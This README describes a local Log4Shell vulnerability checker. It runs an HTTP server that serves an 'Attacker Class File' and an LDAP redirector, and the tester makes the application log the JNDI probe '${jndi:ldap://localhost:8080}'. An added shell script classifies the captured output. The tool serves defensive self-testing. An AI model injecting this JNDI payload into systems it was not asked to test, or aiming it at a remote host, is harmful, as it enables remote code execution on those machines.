log4j2-vulnerability-checker
A local server for checking whether an application is affected by the log4j2 vulnerability "Log4Shell".
Run the following on the same Linux machine as the application you want to verify:
# Get this repository
git clone [email protected]:MirrgieRiana/log4j2-vulnerability-checker.git
cd log4j2-vulnerability-checker
# Compile
bash gradlew installDist
Run each of the following commands in its own window, so that both are running at the same time.
This launches an HTTP server that distributes an Attacker Class File:
bash http.sh 8081
This launches an LDAP server that redirects to the "Attacker HTTP Server":
bash ldap.sh 8080 8081
By some means, make the application log the following string:
<<< ${jndi:ldap://localhost:8080} >>>
If the application is vulnerable, the string "Attacker static init!" is written to stdout, stderr and the logger.
Running Jibaku triggers the vulnerability:
$ bash jibaku.sh
Attacker static init!
Attacker static init!
21:11:55.154 [main] ERROR Jibaku - <<< ${jndi:ldap://localhost:8080} >>>
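To read the result of a check from captured application output, the following is an added example and not part of this repository. The marker and probe strings are the ones shown above; the function name, the verdict labels and the sample log lines are assumptions made for the example.

```shell
#!/bin/sh
# Added example: classify captured output (stdout, stderr or log file)
# after the probe string has been sent to the application under test.
# MARKER and PROBE come from this README; everything else is hypothetical.

MARKER='Attacker static init!'
PROBE='<<< ${jndi:ldap://localhost:8080} >>>'

# classify_output FILE -> prints exactly one verdict on stdout
classify_output() {
    if [ ! -r "$1" ]; then
        echo "cannot read $1" >&2
        return 2
    fi
    if grep -qF -- "$MARKER" "$1"; then
        # The Attacker class was fetched and its static initializer ran.
        echo VULNERABLE
    elif grep -qF -- "$PROBE" "$1"; then
        # The probe reached the logger and was written out verbatim,
        # but no class was loaded during this run.
        echo NOT_TRIGGERED
    else
        # The probe never reached the logger, so nothing was tested.
        echo INCONCLUSIVE
    fi
}

# Constructed sample outputs (the first mirrors the Jibaku run above).
demo() {
    dir=$(mktemp -d)
    printf '%s\n' "$MARKER" "$MARKER" \
        "21:11:55.154 [main] ERROR Jibaku - $PROBE" > "$dir/vulnerable.log"
    printf '%s\n' "10:00:00.000 [main] ERROR App - $PROBE" > "$dir/logged.log"
    printf '%s\n' "10:00:00.000 [main] INFO App - started" > "$dir/unrelated.log"
    for name in vulnerable logged unrelated; do
        printf '%s: %s\n' "$name" "$(classify_output "$dir/$name.log")"
    done
    rm -rf "$dir"
}

demo
```

The probe line also appears in the vulnerable output, so only the marker decides the verdict. NOT_TRIGGERED also results when the HTTP or LDAP server above was not running during the test, so confirm both were up before relying on it.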